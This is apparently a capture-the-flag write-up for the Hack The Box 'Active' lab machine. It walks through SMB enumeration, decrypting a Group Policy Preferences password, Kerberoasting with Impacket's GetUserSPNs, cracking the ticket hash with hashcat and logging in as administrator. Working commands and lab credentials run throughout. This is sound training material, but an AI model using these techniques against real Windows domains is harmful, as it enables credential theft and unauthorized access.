Active
Published on
Contents
Scanning
I’ve put the machine IP in /etc/hosts for easy access:
10.10.10.100 active.htb
Running Nmap against the host:
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2018-10-17 20:52:29Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2018-10-17 22:53:29
|_ start_date: 2018-10-17 21:20:49
Poking Samba
In the Nmap result, Samba is open so we can connect with a Samba client. Let’s enumerate files we can have access to:
smbclient -L 10.10.10.100
Enter WORKGROUP\root's password:
Anonymous login successful
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
Replication Disk
SYSVOL Disk Logon server share
Users Disk
Reconnecting with SMB1 for workgroup listing.
Connection to 10.10.10.100 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Failed to connect with SMB1 -- no workgroup available
Let’s search in Replication folder:
smbclient //10.10.10.100/Replication
Enter WORKGROUP\root's password:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sat Jul 21 12:37:44 2018
.. D 0 Sat Jul 21 12:37:44 2018
active.htb D 0 Sat Jul 21 12:37:44 2018
10459647 blocks of size 4096. 4913160 blocks available
Inside there’s this active.htb folder. I downloaded it as it may contain several files, and it’s easier to explore it in our filesystem.
smb: \> lcd /root/htb/active/
smb: \> mask ""
smb: \> prompt off
smb: \> recurse ON
smb: \> mget active.htb
Inside the folder:
root@nonuser:~# cd htb/active/
root@nonuser:~/htb/active# ls
active.htb
root@nonuser:~/htb/active# cd active.htb/
root@nonuser:~/htb/active/active.htb# ls
DfsrPrivate Policies scripts
root@nonuser:~/htb/active/active.htb# cd Policies/
root@nonuser:~/htb/active/active.htb/Policies# ls
{31B2F340-016D-11D2-945F-00C04FB984F9} {6AC1786C-016F-11D2-945F-00C04fB984F9}
I looked at both directories in Policies, but the one interesting was {31B2F340-016D-11D2-945F-00C04FB984F9}.
root@nonuser:~/htb/active/active.htb/Policies# cd {31B2F340-016D-11D2-945F-00C04FB984F9}
root@nonuser:~/htb/active/active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}# ls
GPT.INI 'Group Policy' MACHINE USER
root@nonuser:~/htb/active/active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}# cd MACHINE
root@nonuser:~/htb/active/active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE# ls
Microsoft Preferences Registry.pol
root@nonuser:~/htb/active/active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE# cd Preferences
root@nonuser:~/htb/active/active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences# ls
Groups
root@nonuser:~/htb/active/active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences# cd Groups
root@nonuser:~/htb/active/active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups# ls
Groups.xml
User (GPP)
Looking at a Groups file usually indicates the User Groups that are in a Windows System, so we may retrieve some info from there:
root@nonuser:~/htb/active/active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups# cat Groups.xml
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>
We can see there is this user SVC_TGS and its password encrypted (cpassword). Group Policy Preferences sets up this password for the Local Administrator account.
It’s encrypted in AES-32, and the key is for public use, so it’s practically plaintext.
There is a tool in Kali called gpp-decrypt that allows to just that, decrypt Group Policy Preferences (GPP) passwords:
root@nonuser:~# gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
/usr/bin/gpp-decrypt:21: warning: constant OpenSSL::Cipher::Cipher is deprecated
GPPstillStandingStrong2k18
There is a Metasploit post module (post/windows/gather/credentials/gpp) that allows retrieving the final password if we had a shell.
So we have the Local Administrator SVC_TGS with password GPPstillStandingStrong2k18. Let’s login again in Samba with his credentials:
root@nonuser:~# smbclient //10.10.10.100/Users --user=SVC_TGS
Enter WORKGROUP\SVC_TGS's password:
Try "help" to get a list of possible commands.
smb: \> ls
. DR 0 Sat Jul 21 16:39:20 2018
.. DR 0 Sat Jul 21 16:39:20 2018
Administrator D 0 Mon Jul 16 12:14:21 2018
All Users DHS 0 Tue Jul 14 07:06:44 2009
Default DHR 0 Tue Jul 14 08:38:21 2009
Default User DHS 0 Tue Jul 14 07:06:44 2009
desktop.ini AHS 174 Tue Jul 14 06:57:55 2009
Public DR 0 Tue Jul 14 06:57:55 2009
SVC_TGS D 0 Sat Jul 21 17:16:32 2018
10459647 blocks of size 4096. 4893142 blocks available
smb: \> cd SVC_TGS\
smb: \SVC_TGS\> ls
. D 0 Sat Jul 21 17:16:32 2018
.. D 0 Sat Jul 21 17:16:32 2018
Contacts D 0 Sat Jul 21 17:14:11 2018
Desktop D 0 Sat Jul 21 17:14:42 2018
Downloads D 0 Sat Jul 21 17:14:23 2018
Favorites D 0 Sat Jul 21 17:14:44 2018
Links D 0 Sat Jul 21 17:14:57 2018
My Documents D 0 Sat Jul 21 17:15:03 2018
My Music D 0 Sat Jul 21 17:15:32 2018
My Pictures D 0 Sat Jul 21 17:15:43 2018
My Videos D 0 Sat Jul 21 17:15:53 2018
Saved Games D 0 Sat Jul 21 17:16:12 2018
Searches D 0 Sat Jul 21 17:16:24 2018
10459647 blocks of size 4096. 4965371 blocks available
smb: \SVC_TGS\> cd Desktop
smb: \SVC_TGS\Desktop\> ls
. D 0 Sat Jul 21 17:14:42 2018
.. D 0 Sat Jul 21 17:14:42 2018
user.txt A 34 Sat Jul 21 17:06:25 2018
10459647 blocks of size 4096. 4965371 blocks available
smb: \SVC_TGS\Desktop\> lcd /root/htb/active/
smb: \SVC_TGS\Desktop\> mget user.txt
Get file user.txt? yes
getting file \SVC_TGS\Desktop\user.txt of size 34 as user.txt (0,1 KiloBytes/sec) (average 0,1 KiloBytes/sec)
smb: \SVC_TGS\Desktop\>
We have user.txt!
root@nonuser:~/htb/active# cat user.txt
****************************e983
Root (Kerberos)
Now that we have access to the Local Administrator, we may try to escalate privileges via the Active Directory with Kerberos.
Kerberos uses a System of tickets to grant access to users to determined functions, cracking this is called Kerberoast.
With a tool from Impacket called ‘GetUserSPNs’ we may get the Service Principal Names.
As the description of the tool says:
This module will try to find Service Principal Names that are associated with normal user account. Since normal account’s password tend to be shorter than machine accounts, and knowing that a TGS request will encrypt the ticket with the account the SPN is running under, this could be used for an offline bruteforcing attack of the SPNs account NTLM hash if we can gather valid TGS for those SPNs.
So if we get the SPN’s, we may get the ticket that grants us access to the rest of the functionalities.
root@nonuser:~/impacket/examples# ./GetUserSPNs.py -request -dc-ip 10.10.10.100 active.htb/SVC_TGS
Impacket v0.9.18-dev - Copyright 2018 SecureAuth Corporation
$krb5tgs$23$*Administrator$ACTIVE.HTB$active/CIFS~445*$7dab0eb7f81a9e6d9a17a081fd44c5c7$5fda79e1392542d15c5be1c041129f6814f66efcf3edd01bc8bc73331e78e12371f1babefe0110e8100605581a3ff596fd7a35b255ae495d15a80543e8db9f92030b9410f6b863f7912cf32cf4558f23eb63c4bc6afebaabbf08e731580282a3350935fe9f7144ec18806cdb1ec3f76b94f99df4a6722edd3015b0d380bc7564187c54cce6de6ae733fcbe70eb0625bd62da6e613574db885e8c5dba5ffd94beeec40d4f6c009a89f32ca571cdbf4b7830b344406cb7ba3a4f2e2b5970ce47d629d15d7b972e8f049e860bd79bdeb862de1502a173f0d74cf5a9822ba3de43cd1eb37f688c8d9cac945d45aed8eeaef93de36213b9746c088698fb89c41cb90f18c91d45ccd595eb2a6c1b7dc6c74ecb65dbfd72fc2ab4d5e8a1ee8d16ce6d8705602d9d5b0024c7622de179b5852c178a4a53faeecaa329a23d0db00a187d76b225e7109ce913e8f938592847fed4b4651a789919350892f3ff056b0f0b1c83106dd4d4c10d8e4ff691b3949adb767594ab24d52f80f8e3de051fec00082ce718c1418b32282a68cd82c7bb85a5e89d9452943ba11e87884f73d0293c221799a9265885cd30d8c16d351014e0b49421836819c19fc705715edea1d78e7748bace9f13b576bcc1fff32bd0f4dac0fa54fe1e73f1b6c0703805f581bff78e8280b6732fac805b694fc8c5ca601a2d263dec351bac9f20dd98cb83713fb06df92dbf7bd1057e4a8ca0e23706fcdd33087d20d0cc3b38f50e0795f4b969fc88fdd040de3540ae43860e59486c0a075df5029ad4595b46bf6f51bbb56f0623ee6956c4c094620be47a3c8de09bf2529fc2792ea53fef8b6d7e63c416dd5016ee0cb9efb71da7465bfc5e9efd3675ec71f08cebc9bff48ae6590dcf88ef6efb4bb539be68646175db2bc67aab07a666b809d2fc78721e076dec3dae13315334f7fe02a45586eb8cc1445cc0579073d1b8d925e68bc1b4dd4da51fd8f15bd97db06e4eb0b35cf415b50f195a3549586dabd14fe2e7699c4cacd269afc72a5e1b425af11b652f3f58230f0d8c36c6a517f43044a5c6894e02b4fded8c459e27ec3b3f965dd314e0253e28f07268883b39a4c9268c4db0f2cd2f210f54583e9b329f5d94e596002c68a1608c0ab6590681844421c97b4fd091a6505b473ece2e7eee9cbadbc8ca09c180465b699e8a60876657b3ef5fafba98c14ae26b8877ac03eace58c89961c12d4ab9369bbd6b5f72d4c711d9eb1b048126a12af6d0
The resultant hash is different in each case, so don’t worry if yours is different from this.
We put the hash in a .txt and decrypt it with hashcat:
hashcat -m 13100 -a 0 --force kerberos_admin.txt /usr/share/wordlists/rockyou.txt
Administrator Password is Ticketmaster1968. In Linux the admin is root, but in Windows is called administrator.
So let’s log in again in Samba with those credentials:
root@nonuser:~# smbclient //10.10.10.100/C$ --user=administrator
Enter WORKGROUP\administrator's password:
Try "help" to get a list of possible commands.
smb: \> ls
$Recycle.Bin DHS 0 Tue Jul 14 04:34:39 2009
Config.Msi DHS 0 Mon Jul 30 16:10:06 2018
Documents and Settings DHS 0 Tue Jul 14 07:06:44 2009
pagefile.sys AHS 4294500352 Thu Oct 18 21:51:51 2018
PerfLogs D 0 Tue Jul 14 05:20:08 2009
Program Files DR 0 Wed Jul 18 20:44:51 2018
Program Files (x86) DR 0 Wed Jul 18 20:44:52 2018
ProgramData DH 0 Mon Jul 30 15:49:31 2018
Recovery DHS 0 Mon Jul 16 12:13:22 2018
System Volume Information DHS 0 Wed Jul 18 20:45:01 2018
Users DR 0 Sat Jul 21 16:39:20 2018
Windows D 0 Mon Jul 30 15:42:18 2018
10459647 blocks of size 4096. 4932139 blocks available
smb: \> cd Users/Administrator/Desktop
smb: \Users\Administrator\Desktop\> ls
. DR 0 Mon Jul 30 15:50:10 2018
.. DR 0 Mon Jul 30 15:50:10 2018
desktop.ini AHS 282 Mon Jul 30 15:50:10 2018
root.txt A 34 Sat Jul 21 17:06:07 2018
10459647 blocks of size 4096. 4932139 blocks available
smb: \Users\Administrator\Desktop\>
We have root!
root@nonuser:~/Documentos/active.htb# cat root.txt
****************************708b